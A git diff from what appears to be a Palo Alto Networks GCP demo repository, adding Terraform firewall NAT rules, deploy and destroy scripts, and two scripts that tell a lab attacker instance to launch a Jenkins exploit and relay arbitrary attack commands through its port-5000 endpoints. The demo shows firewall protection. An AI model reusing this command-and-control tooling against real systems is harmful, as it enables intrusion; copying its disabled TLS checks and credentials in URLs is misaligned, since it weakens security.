+resource "panos_nat_rule_group" "nat" {
+  rule {
+    name = "Web1 SSH"
+    original_packet {
+      source_zones          = ["${panos_zone.zone_untrust.name}"]
+      destination_zone      = "${panos_zone.zone_untrust.name}"
+      source_addresses      = ["any"]
+      destination_addresses = ["${var.FW_Untrust_IP}"]
+      service               = "${panos_service_object.so_221.name}"
+    }
+    translated_packet {
+      source {
+        dynamic_ip_and_port {
+          interface_address {
+            interface = "${panos_ethernet_interface.eth1_2.name}"
+          }
+        }
+      }
+      destination {
+        static {
+          address = "${var.Webserver_IP1}"
+          port = 22
+        }
+      }
+    }
+  }
+  rule {
+    name = "Web2 SSH"
+    original_packet {
+      source_zones          = ["${panos_zone.zone_untrust.name}"]
+      destination_zone      = "${panos_zone.zone_untrust.name}"
+      source_addresses      = ["any"]
+      destination_addresses = ["${var.FW_Untrust_IP}"]
+      service               = "${panos_service_object.so_222.name}"
+    }
+    translated_packet {
+      source {
+        dynamic_ip_and_port {
+          interface_address {
+            interface = "${panos_ethernet_interface.eth1_2.name}"
+          }
+        }
+      }
+      destination {
+        static {
+          address = "${var.Webserver_IP2}"
+          port = 22
+        }
+      }
+    }
+  }
+  rule {
+    name = "Webserver NAT"
+    original_packet {
+      source_zones          = ["${panos_zone.zone_untrust.name}"]
+      destination_zone      = "${panos_zone.zone_untrust.name}"
+      source_addresses      = ["any"]
+      destination_addresses = ["${var.FW_Untrust_IP}"]
+      service               = "service-http"
+    }
+    translated_packet {
+      source {
+        dynamic_ip_and_port {
+          interface_address {
+            interface = "${panos_ethernet_interface.eth1_2.name}"
+          }
+        }
+      }
+      destination {
+        static {
+          address = "GCP-Int-LB"
+        }
+      }
+    }
+  }
+}
+resource "panos_virtual_router" "vr1" {
+  name       = "default"
+  interfaces = ["${panos_ethernet_interface.eth1_1.name}", "${panos_ethernet_interface.eth1_2.name}"]
+}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf
new file mode 100644
index 00000000..879b9d9b
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/gcp_vars.tf
@@ -0,0 +1,7 @@
+variable "FW_Mgmt_IP" {}
+variable "FW_Untrust_IP" {}
+variable "Webserver_IP1" {}
+variable "Webserver_IP2" {}
+variable "WebLB_IP" {}
+variable "Admin_Username" {}
+variable "Admin_Password" {}
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars
new file mode 100644
index 00000000..ae5cfd65
--- /dev/null
+++ b/gcp/Jenkins_proj-master/WebInFWConf/terraform.tfvars
@@ -0,0 +1,11 @@
+Admin_Username = "<Admin Username>"
+
+Admin_Password = "<Admin Password>"
+
+FW_Untrust_IP = "10.0.1.10"
+
+WebLB_IP = "10.0.2.30"
+
+Webserver_IP1 = "10.0.2.50"
+
+Webserver_IP2 = "10.0.2.60"
\ No newline at end of file
diff --git a/gcp/Jenkins_proj-master/deploy.py b/gcp/Jenkins_proj-master/deploy.py
new file mode 100644
index 00000000..35b66a1e
--- /dev/null
+++ b/gcp/Jenkins_proj-master/deploy.py
@@ -0,0 +1,653 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage
+
+python deploy.py -u <fwusername> -p<fwpassword> -r<resource group> -a<region>
+
+"""
+
+import argparse
+import json
+import logging
+import os
+import subprocess
+import sys
+import time
+import uuid
+import xml.etree.ElementTree as ET
+import xmltodict
+import requests
+import urllib3
+from google.cloud import storage
+
+
+from pandevice import firewall
+from python_terraform import Terraform
+from collections import OrderedDict
+
+
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+_archive_dir = './WebInDeploy/bootstrap'
+_content_update_dir = './WebInDeploy/content_updates/'
+
+logging.basicConfig(level=logging.INFO)
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+
+
+# global var to keep status output
+status_output = dict()
+
+
+def send_request(call):
+
+    """
+    Handles sending requests to API
+    :param call: url
+    :return: Retruns result of call. Will return response for codes between 200 and 400.
+             If 200 response code is required check value in response
+    """
+    headers = {'Accept-Encoding' : 'None',
+               'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
+                              'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
+
+    try:
+        r = requests.get(call, headers = headers, verify=False, timeout=5)
+        r.raise_for_status()
+    except requests.exceptions.HTTPError as errh:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response 
+        '''
+        logger.debug("DeployRequestException Http Error:")
+        raise DeployRequestException("Http Error:")
+    except requests.exceptions.ConnectionError as errc:
+        logger.debug("DeployRequestException Connection Error:")
+        raise DeployRequestException("Connection Error")
+    except requests.exceptions.Timeout as errt:
+        logger.debug("DeployRequestException Timeout Error:")
+        raise DeployRequestException("Timeout Error")
+    except requests.exceptions.RequestException as err:
+        logger.debug("DeployRequestException RequestException Error:")
+        raise DeployRequestException("Request Error")
+    else:
+        return r
+
+
+class DeployRequestException(Exception):
+    pass
+
+def walkdict(dict, match):
+    """
+    Finds a key in a dict or nested dict and returns the value associated with it
+    :param d: dict or nested dict
+    :param key: key value
+    :return: value associated with key
+    """
+    for key, v in dict.items():
+        if key == match:
+            jobid = v
+            return jobid
+        elif isinstance(v, OrderedDict):
+            found = walkdict(v, match)
+            if found is not None:
+                return found
+
+
+
+def update_fw(fwMgtIP, api_key):
+    """
+    Applies latest AppID, Threat and AV updates to firewall after launch
+    :param fwMgtIP: Firewall management IP
+    :param api_key: API key
+
+    """
+    # # Download latest applications and threats
+
+    type = "op"
+    cmd = "<request><content><upgrade><download><latest></latest></download></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid = 0
+    jobid = ''
+    key = 'job'
+
+    # FIXME - Remove Duplicate code for parsing jobid
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    # FIXME - Remove Duplicate code for showing job status
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP download Complete ")
+                        completed = 1
+                    print("Download latest Applications and Threats update")
+                    status = "APP+TP download Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
+            else:
+                logger.info('Unable to determine job status')
+                completed = 1
+
+    # Install latest content update
+    type = "op"
+    cmd = "<request><content><upgrade><install><version>latest</version><commit>no</commit></install></upgrade></content></request>"
+    call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+    getjobid = 0
+    jobid = ''
+    key = 'job'
+
+    while getjobid == 0:
+        try:
+            r = send_request(call)
+            logger.info('Got response {} to request for content upgrade '.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (fwMgtIP, jobid, api_key)
+        try:
+            r = send_request(call)
+            logger.info('Got Response {} to show jobs '.format(r.text))
+        except:
+            DeployRequestException
+            logger.debug("failed to get jobid this time.  Try again")
+        else:
+            tree = ET.fromstring(r.text)
+            if tree.attrib['status'] == 'success':
+                try:
+                    if (tree[0][0][5].text == 'FIN'):
+                        logger.debug("APP+TP Install Complete ")
+                        completed = 1
+                    print("Install latest Applications and Threats update")
+                    status = "APP+TP Install Status - " + str(tree[0][0][5].text) + " " + str(
+                        tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+                except:
+                    logger.info('Checking job is complete')
+                    completed = 1
+            else:
+                logger.info('Unable to determine job status')
+                completed = 1
+
+
+    # Download latest anti-virus update without committing
+    getjobid = 0
+    jobid = ''
+    type = "op"
+    cmd = "<request><anti-virus><upgrade><download><latest></latest></download></upgrade></anti-virus></request>"
+    key = 'job'
+    while getjobid == 0:
+        try:
+            call = "https://%s/api/?type=%s&cmd=%s&key=%s" % (fwMgtIP, type, cmd, api_key)
+            r = send_request(call)
+            logger.info('Got response to request AV install {}'.format(r.text))
+        except:
+            DeployRequestException
+            logger.info("Didn't get http 200 response.  Try again")
+        else:
+            try:
+                dict = xmltodict.parse(r.text)
+                if isinstance(dict, OrderedDict):
+                    jobid = walkdict(dict, key)
+            except Exception as err:
+                logger.info("Got exception {} trying to parse jobid from Dict".format(err))
+            if not jobid:
+                logger.info('Got http 200 response but didnt get jobid')
+                time.sleep(30)
+            else:
+                getjobid = 1
+
+    completed = 0
+    while (completed == 0):
+        time.sleep(45)
+        call = "https://%s/api/?type=op&cmd=<show><jobs><id>%s</id></jobs></show>&key=%s" % (
+            fwMgtIP, jobid, api_key)
+        r = send_request(call)
+        tree = ET.fromstring(r.text)
+        logger.debug('Got response for show job {}'.format(r.text))
+        if tree.attrib['status'] == 'success':
+            try:
+                if (tree[0][0][5].text == 'FIN'):
+                    logger.info("AV install Status Complete ")
+                    completed = 1
+                else:
+                    status = "Status - " + str(tree[0][0][5].text) + " " + str(tree[0][0][12].text) + "% complete"
+                    print('{0}\r'.format(status))
+            except:
+                logger.info('Could not parse output from show jobs, with jobid {}'.format(jobid))
+                completed = 1
+        else:
+            logger.info('Unable to determine job status')
+            completed = 1
+
+
+def getApiKey(hostname, username, password):
+
+    """
+    Generates a Paloaltonetworks api key from username and password credentials
+    :param hostname: Ip address of firewall
+    :param username:
+    :param password:
+    :return: api_key API key for firewall
+    """
+
+
+    call = "https://%s/api/?type=keygen&user=%s&password=%s" % (hostname, username, password)
+
+    api_key = ""
+    while True:
+        try:
+            # response = urllib.request.urlopen(url, data=encoded_data, context=ctx).read()
+            response = send_request(call)
+
+
+        except DeployRequestException as updateerr:
+            logger.info("No response from FW. Wait 20 secs before retry")
+            time.sleep(10)
+            continue
+
+        else:
+            api_key = ET.XML(response.content)[0][0].text
+            logger.info("FW Management plane is Responding so checking if Dataplane is ready")
+            logger.debug("Response to get_api is {}".format(response))
+            return api_key
+
+
+def getFirewallStatus(fwIP, api_key):
+    fwip = fwIP
+
+    """
+    Gets the firewall status by sending the API request show chassis status.
+    :param fwMgtIP:  IP Address of firewall interface to be probed
+    :param api_key:  Panos API key
+    """
+
+    url = "https://%s/api/?type=op&cmd=<show><chassis-ready></chassis-ready></show>&key=%s" % (fwip, api_key)
+    # Send command to fw and see if it times out or we get a response
+    logger.info("Sending command 'show chassis status' to firewall")
+    try:
+        response = requests.get(url, verify=False, timeout=10)
+        response.raise_for_status()
+    except requests.exceptions.Timeout as fwdownerr:
+        logger.debug("No response from FW. So maybe not up!")
+        return 'no'
+        # sleep and check again?
+    except requests.exceptions.HTTPError as fwstartgerr:
+        '''
+        Firewall may return 5xx error when rebooting.  Need to handle a 5xx response
+        raise_for_status() throws HTTPError for error responses
+        '''
+        logger.infor("Http Error: {}: ".format(fwstartgerr))
+        return 'cmd_error'
+    except requests.exceptions.RequestException as err:
+        logger.debug("Got RequestException response from FW. So maybe not up!")
+        return 'cmd_error'
+    else:
+        logger.debug("Got response to 'show chassis status' {}".format(response))
+
+        resp_header = ET.fromstring(response.content)
+        logger.debug('Response header is {}'.format(resp_header))
+
+        if resp_header.tag != 'response':
+            logger.debug("Did not get a valid 'response' string...maybe a timeout")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'error':
+            logger.debug("Got an error for the command")
+            return 'cmd_error'
+
+        if resp_header.attrib['status'] == 'success':
+            # The fw responded with a successful command execution. So is it ready?
+            for element in resp_header:
+                if element.text.rstrip() == 'yes':
+                    logger.info("FW Chassis is ready to accept configuration and connections")
+                    return 'yes'
+                else:
+                    logger.info("FW Chassis not ready, still waiting for dataplane")
+                    time.sleep(10)
+                    return 'almost'
+
+
+def update_status(key, value):
+    """
+    For tracking purposes.  Write responses to file.
+    :param key:
+    :param value:
+    :return:
+    """
+    global status_output
+
+    if type(status_output) is not dict:
+        logger.info('Creating new status_output object')
+        status_output = dict()
+
+    if key is not None and value is not None:
+        status_output[key] = value
+
+    # write status to file to future tracking
+    write_status_file(status_output)
+
+
+def write_status_file(message_dict):
+    """
+    Writes the deployment state to a dict and outputs to file for status tracking
+    """
+    try:
+        message_json = json.dumps(message_dict)
+        with open('deployment_status.json', 'w+') as dpj:
+            dpj.write(message_json)
+
+    except ValueError as ve:
+        logger.error('Could not write status file!')
+        print('Could not write status file!')
+        sys.exit(1)
+
+
+
+
+def getServerStatus(IP):
+    """
+    Gets the server status by sending an HTTP request and checking for a 200 response code
+
+    """
+    global gcontext
+
+    call = ("http://" + IP + "/")
+    logger.info('URL request is {}'.format(call))
+    # Send command to fw and see if it times out or we get a response
+    count = 0
+    max_count = 18
+    while True:
+        if count < max_count:
+            time.sleep(10)
+            try:
+                count = count + 1
+                r = send_request(call)
+            except DeployRequestException as e:
+                logger.debug("Got Invalid response".format(e))
+            else:
+                logger.info('Jenkins Server responded with HTTP 200 code')
+                return 'server_up'
+        else:
+            break
+    return 'server_down'
+
+
+def apply_tf(working_dir, vars, description):
+
+    """
+    Handles terraform operations and returns variables in outputs.tf as a dict.
+    :param working_dir: Directory that contains the tf files
+    :param vars: Additional variables passed in to override defaults equivalent to -var
+    :param description: Description of the deployment for logging purposes
+    :return:    return_code - 0 for success or other for failure
+                outputs - Dictionary of the terraform outputs defined in the outputs.tf file
+
+    """
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    # Class Terraform uses subprocess and setting capture_output to True will capture output
+    capture_output = kwargs.pop('capture_output', False)
+
+    if capture_output is True:
+        stderr = subprocess.PIPE
+        stdout = subprocess.PIPE
+    else:
+        # if capture output is False, then everything will essentially go to stdout and stderrf
+        stderr = sys.stderr
+        stdout = sys.stdout
+
+    start_time = time.asctime()
+    print('Starting Deployment at {}\n'.format(start_time))
+
+    # Create Bootstrap
+
+    tf = Terraform(working_dir=working_dir)
+
+    tf.cmd('init')
+    if run_plan:
+
+        # print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code, stdout, stderr = tf.apply(vars = vars, capture_output = capture_output,
+                                            skip_plan = True, **kwargs)
+    outputs = tf.output()
+
+    logger.debug('Got Return code {} for deployment of  {}'.format(return_code, description))
+
+    return (return_code, outputs)
+
+
+
+def main(username, password, GCP_region, Billing_Account ):
+
+    """
+    Main function
+    :param username:
+    :param password:
+    :param rg_name: Resource group name prefix
+    :param azure_region: Region
+    :return:
+    """
+    username = username
+    password = password
+    # TODO maybe use a zone lookup but for now use region-B
+    GCP_Zone = GCP_region + '-b'
+
+
+
+
+
+    WebInDeploy_vars = {
+        'GCP_Zone': GCP_Zone,
+        'GCP_Region': GCP_region,
+        'Billing_Account': Billing_Account,
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    WebInFWConf_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    kwargs = {"auto-approve": True}
+
+    #
+    # Build Infrastructure
+    #
+    #
+
+    return_code, web_in_deploy_output = apply_tf('./WebInDeploy', WebInDeploy_vars, 'WebInDeploy')
+
+    logger.debug('Got Return code for deploy WebInDeploy {}'.format(return_code))
+
+
+    update_status('web_in_deploy_output', web_in_deploy_output)
+    if return_code == 0:
+        update_status('web_in_deploy_status', 'success')
+        albDns = web_in_deploy_output['ALB-DNS']['value']
+        nlbDns = web_in_deploy_output['NATIVE-DNS']['value']
+        fwMgtIP = web_in_deploy_output['FW_Mgmt_IP']['value']
+
+        logger.info("Got these values from output of WebInDeploy \n\n")
+        logger.info("AppGateway address is {}".format(albDns))
+        logger.info("Firewall Mgt address is {}".format(fwMgtIP))
+
+    else:
+        logger.info("WebInDeploy failed")
+        update_status('web_in_deploy_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+    #
+    # Check firewall is up and running
+    #
+    #
+
+    api_key = getApiKey(fwMgtIP, username, password)
+
+    while True:
+        err = getFirewallStatus(fwMgtIP, api_key)
+        if err == 'cmd_error':
+            logger.info("Command error from fw ")
+
+        elif err == 'no':
+            logger.info("FW is not up...yet")
+            # print("FW is not up...yet")
+            time.sleep(60)
+            continue
+
+        elif err == 'almost':
+            logger.info("MGT up waiting for dataplane")
+            time.sleep(20)
+            continue
+
+        elif err == 'yes':
+            logger.info("FW is up")
+            break
+
+    logger.debug('Giving the FW another 10 seconds to fully come up to avoid race conditions')
+    time.sleep(10)
+    fw = firewall.Firewall(hostname=fwMgtIP, api_username=username, api_password=password)
+
+
+    logger.info("Updating firewall with latest content pack")
+    update_fw(fwMgtIP, api_key)
+
+    #
+    # Configure Firewall
+    #
+    WebInFWConf_vars.update({'FW_Mgmt_IP': fwMgtIP})
+
+    logger.info("Applying addtional config to firewall")
+
+    return_code, web_in_fw_conf_out = apply_tf('./WebInFWConf', WebInFWConf_vars, 'WebInFWConf')
+    logger.debug('Got return code {}'.format(return_code))
+    if return_code == 0:
+        update_status('web_in_fw_conf', 'success')
+        logger.info("WebInFWConf succeeded")
+
+    else:
+        logger.info("WebInFWConf failed")
+        update_status('web_in_deploy_status', 'error')
+        print(json.dumps(status_output))
+        exit(1)
+
+    logger.info("Commit changes to firewall")
+
+    fw.commit()
+    logger.info("waiting for commit")
+    time.sleep(60)
+    logger.info("waiting for commit")
+
+    #
+    # Check Jenkins
+    #
+
+    logger.info('Checking if Jenkins Server is ready')
+
+    res = getServerStatus(albDns)
+
+    if res == 'server_up':
+        logger.info('Jenkins Server is ready')
+        logger.info('\n\n   ### Deployment Complete ###')
+        logger.info('\n\n   Connect to Jenkins Server at http://{}'.format(albDns))
+    else:
+        logger.info('Jenkins Server is down')
+        logger.info('\n\n   ### Deployment Complete ###')
+
+    # dump out status to stdout
+    print(json.dumps(status_output))
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+    parser.add_argument('-a', '--GCP_Region', help='GCP Region', required=True)
+    # parser.add_argument('-r', '--GCP_Zone', help='GCP Zone', required=True)
+    parser.add_argument('-m', '--Billing_Account', help='Billing Account', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+    # GCP_Zone = args.GCP_Zone
+    GCP_Region = args.GCP_Region
+    Billing_Account = args.Billing_Account
+
+    main(username, password, GCP_Region, Billing_Account)
diff --git a/gcp/Jenkins_proj-master/destroy.py b/gcp/Jenkins_proj-master/destroy.py
new file mode 100644
index 00000000..a314e0d1
--- /dev/null
+++ b/gcp/Jenkins_proj-master/destroy.py
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+"""
+# Copyright (c) 2018, Palo Alto Networks
+#
+# Permission to use, copy, modify, and/or distribute this software for any
+# purpose with or without fee is hereby granted, provided that the above
+# copyright notice and this permission notice appear in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
+# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
+# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
+# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
+
+# Author: Justin Harris jharris@paloaltonetworks.com
+
+Usage:
+git
+python destroy.py
+
+"""
+
+import argparse
+import logging
+
+from python_terraform import Terraform
+
+logger = logging.getLogger()
+handler = logging.StreamHandler()
+formatter = logging.Formatter('%(levelname)-8s %(message)s')
+handler.setFormatter(formatter)
+logger.addHandler(handler)
+logger.setLevel(logging.INFO)
+
+
+def main(username, password):
+    username = username
+    password = password
+
+    WebInDeploy_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    WebInBootstrap_vars = {
+        'Admin_Username': username,
+        'Admin_Password': password
+    }
+
+    albDns = ''
+    nlbDns = ''
+    fwMgt = ''
+
+    # Set run_plan to TRUE is you wish to run terraform plan before apply
+    run_plan = False
+    deployment_status = {}
+    kwargs = {"auto-approve": True}
+
+    #
+    # Destroy Infrastructure
+    #
+    tf = Terraform(working_dir='./WebInDeploy')
+    rg_name = tf.output('RG_Name')
+
+    attack_rg_name = tf.output('Attacker_RG_Name')
+    logger.info('Got RG_Name {} and Attacker_RG_Name {}'.format(rg_name, attack_rg_name))
+
+    WebInDeploy_vars.update({'RG_Name': rg_name})
+    WebInDeploy_vars.update({'Attack_RG_Name': attack_rg_name})
+
+    if run_plan:
+        print('Calling tf.plan')
+        tf.plan(capture_output=False)
+
+    return_code1, stdout, stderr = tf.cmd('destroy', var=WebInDeploy_vars, capture_output=False, **kwargs)
+    # return_code1 =0
+    print('Got return code {}'.format(return_code1))
+
+    if return_code1 != 0:
+        logger.info("Failed to destroy build ")
+
+        exit()
+    else:
+
+        logger.info("Destroyed WebInDeploy ")
+
+
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Get Terraform Params')
+    parser.add_argument('-u', '--username', help='Firewall Username', required=True)
+    parser.add_argument('-p', '--password', help='Firewall Password', required=True)
+
+    args = parser.parse_args()
+    username = args.username
+    password = args.password
+
+    main(username, password)
diff --git a/gcp/Jenkins_proj-master/gcp_login.py b/gcp/Jenkins_proj-master/gcp_login.py
new file mode 100644
index 00000000..ecec1f80
--- /dev/null
+++ b/gcp/Jenkins_proj-master/gcp_login.py
@@ -0,0 +1,23 @@
+import os
+"""
+gloud_login
+Runs the shell command to invoke login.
+The login process creates a new browser window for interactive login.
+The login process updates the gloud auth files in ~/.config/gcloud
+Files updated are:
+    access_tokens.db
+    config_sentinel
+    credentials.db
+
+The login process stores credentials in sqlite3 in ~/.config/gcloud/credentials.db
+
+https://www.jhanley.com/google-cloud-where-are-my-credentials-stored/
+
+"""
+
+def gcloud_login():
+    cmd = 'gcloud auth login'
+    os.system(cmd)
+
+if __name__ == '__main__':
+    gcloud_login()
diff --git a/gcp/Jenkins_proj-master/launch_attack_vector.py b/gcp/Jenkins_proj-master/launch_attack_vector.py
new file mode 100644
index 00000000..dce17b39
--- /dev/null
+++ b/gcp/Jenkins_proj-master/launch_attack_vector.py
@@ -0,0 +1,72 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+    tf = Terraform(working_dir='./WebInDeploy')
+    rc, out, err = tf.cmd('output', '-json')
+
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError as ve:
+            print('Could not parse terraform outputs!')
+            return dict()
+
+
+def main(attack_vector: str) -> None:
+
+    print('Attempting to launch exploit...\n')
+    outputs = get_terraform_outputs()
+    print(outputs)
+    if attack_vector == 'native':
+        print('Using native waf protected attack vector...\n')
+        target = outputs['NATIVE-DNS']['value']
+    elif attack_vector == 'panos':
+        print('Using PAN-OS protected attack vector...\n')
+        target = outputs['ALB-DNS']['value']
+    else:
+        print('malformed outputs!')
+        target = '127.0.0.1'
+    if 'ATTACKER_IP' not in outputs:
+        print('No attacker ip found in tf outputs!')
+        sys.exit(1)
+
+    attacker = outputs['ATTACKER_IP']['value']
+    payload = dict()
+    payload['attacker'] = attacker
+    payload['target'] = target
+
+    headers = dict()
+    headers['Content-Type'] = 'application/json'
+    headers['Accept'] = '*/*'
+
+    try:
+        resp = requests.post(f'http://{attacker}:5000/launch', data=json.dumps(payload), headers=headers)
+        if resp.status_code == 200:
+            print('Exploit Successfully Launched!\n')
+            print(resp.text)
+            sys.exit(0)
+        else:
+            print('Could not Launch Exploit!\n')
+            print(resp.text)
+            sys.exit(0)
+    except ConnectionRefusedError as cre:
+        print('Could not connect to attacker instance!')
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Launch Jenkins Attack CnC')
+    parser.add_argument('-c', '--vector', help='Attack Vector', required=True)
+
+    args = parser.parse_args()
+    vector = args.vector
+
+    main(vector)
+
diff --git a/gcp/Jenkins_proj-master/requirements.txt b/gcp/Jenkins_proj-master/requirements.txt
new file mode 100644
index 00000000..ad92f262
--- /dev/null
+++ b/gcp/Jenkins_proj-master/requirements.txt
@@ -0,0 +1,12 @@
+google-api-core==1.11.1
+google-auth==1.6.3
+google-cloud-core==1.0.1
+google-cloud-storage==1.16.1
+google-resumable-media==0.3.2
+googleapis-common-protos==1.6.0
+pan-python==0.14.0
+pandevice==0.11.0  
+python-terraform==0.10.0
+requests==2.21.0
+urllib3==1.24.2
+xmltodict==0.12.0
diff --git a/gcp/Jenkins_proj-master/send_command.py b/gcp/Jenkins_proj-master/send_command.py
new file mode 100644
index 00000000..cbccbdfb
--- /dev/null
+++ b/gcp/Jenkins_proj-master/send_command.py
@@ -0,0 +1,63 @@
+#!/usr/bin/env python3
+
+import requests
+import argparse
+from python_terraform import Terraform
+import json
+import sys
+
+
+def get_terraform_outputs() -> dict:
+    tf = Terraform(working_dir='./WebInDeploy')
+    rc, out, err = tf.cmd('output', '-json')
+
+    if rc == 0:
+        try:
+            return json.loads(out)
+        except ValueError as ve:
+            print('Could not parse terraform outputs!')
+            return dict()
+
+
+def main(cli: str) -> None:
+
+    print('Attempting to launch exploit...\n')
+    outputs = get_terraform_outputs()
+
+    attacker = outputs['ATTACKER_IP']['value']
+    payload = dict()
+    payload['cli'] = cli
+
+    headers = dict()
+    headers['Content-Type'] = 'application/json'
+    headers['Accept'] = '*/*'
+
+    try:
+        resp = requests.post(f'http://{attacker}:5000/send', data=json.dumps(payload), headers=headers)
+        if resp.status_code == 200:
+            print('Command Successfully Executed!\n')
+            print(resp.text)
+            sys.exit(0)
+        else:
+            print('Could not Execute Command!\n')
+            print(resp.text)
+            sys.exit(0)
+    except ConnectionRefusedError as cre:
+        print('Could not connect to attacker instance!')
+        sys.exit(1)
+
+
+if __name__ == '__main__':
+    parser = argparse.ArgumentParser(description='Send Jenkins Attack Command')
+    parser.add_argument('-c', '--cli', help='Attack Command', required=True)
+    parser.add_argument('-m', '--manual_cli', help='Manual Attack Command', required=False)
+
+    args = parser.parse_args()
+    cli = args.cli
+    mcli = args.manual_cli
+
+    if mcli is not None and mcli != '':
+        main(mcli)
+    else:
+        main(cli)
+
diff --git a/gcp/adv-peering-with-lbnh/README.md b/gcp/adv-peering-with-lbnh/README.md
new file mode 100644
index 00000000..f2a711cb
--- /dev/null
+++ b/gcp/adv-peering-with-lbnh/README.md
@@ -0,0 +1,73 @@
+## 4 x VM-Series / 2 x Spoke VPCs via Advanced Peering and Load Balancer as Next Hop
+Terraform creates 4 VM-Series firewalls that secure ingress/egress/east-west traffic for 2 spoke VPCs.  The spoke VPCs are connected (via VPC Peering and Load Balancer as Next Hop) to the VM-Series. After the build completes, several manual changes must be performed to enable transitive routing.  The manual changes are required since they cannot be performed through Terraform, yet.
+
+### Overview
+* 8 x VPCs (ilb-mgmt,ilb-untust,ilb-trust,mgmt, untrust, trust, spoke1, & spoke2) with relevant peering connections
